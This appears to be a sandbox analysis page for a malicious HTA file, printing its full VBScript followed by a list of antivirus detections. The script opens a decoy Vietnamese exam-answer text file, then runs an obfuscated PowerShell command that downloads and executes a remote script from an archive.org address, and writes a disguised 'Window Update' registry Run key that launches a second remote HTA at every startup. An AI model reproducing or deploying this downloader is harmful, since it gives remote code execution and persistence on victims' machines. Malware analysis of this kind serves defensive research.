Static | ZeroBOX
No static analysis available.
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Set oShell = CreateObject("WScript.Shell")
FileName = oShell.ExpandEnvironmentStrings("%Temp%\MaGiaiNenNe.txt")
Set oShell = Nothing 'Tidy up the Objects we no longer need
Set fso = CreateObject("Scripting.FileSystemObject")
Set oFile = fso.CreateTextFile(FileName,true,true)
oFile.WriteLine "Do s
thi qu
n team m
nh 1 file"
oFile.WriteLine "c
t data n
m theo c
m cho team nh
oFile.WriteLine "Ch
n thi v
oFile.WriteLine "M
: Y6D93CRG"
oFile.Close
Set oFile = Nothing 'Tidy up the Objects we no longer need
Set fso = Nothing 'Tidy up the Objects we no longer need
CreateObject("WScript.Shell").Run(FileName)
Dim XRTFYGUHIYRDTYFUGHI
Set XRTFYGUHIYRDTYFUGHI= CreateObject("WScript.Shell")
XGRCHTVJYBKUNLI="pow"
GRHTFJYGKUHLIJ="ers"
ESRDGHTFYJGUKHILJ="hell"
GRDHTFYGUHIJO = " $A='DowRing'.Replace('R','nloadstr');"
FBCTFYGUGYFTD ="$B = 'WebCAMt'.Replace('AM','lien');"
ESGRDHTFJGYUH = "$d='tnt'.Replace('tn','Ne');$link ='https://ia601400.us.archive.org/31/items/bypass_20210428_0905/bypass.txt';"
CYYTURDHTC ="$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X"
OK = XGRCHTVJYBKUNLI+GRHTFJYGKUHLIJ+ESRDGHTFYJGUKHILJ+GRDHTFYGUHIJO++FBCTFYGUGYFTD+ESGRDHTFJGYUH+CYYTURDHTC+" "
XRTFYGUHIYRDTYFUGHI.Run OK,0
self.close
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window Update","C:\Windows\System32\mshta.exe https://archive.org/download/hbankers_20210428_1011/HBankers.hta --auto-launch-at-startup","REG_SZ"
</script>
<body>
</body>
</HEAD>
</HTML>
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
AegisLab Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.DTF
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.HTML.Backdoor.zq
FireEye Clean
Sophos Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
GData Clean
AhnLab-V3 Clean
Acronis Clean
ALYac Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.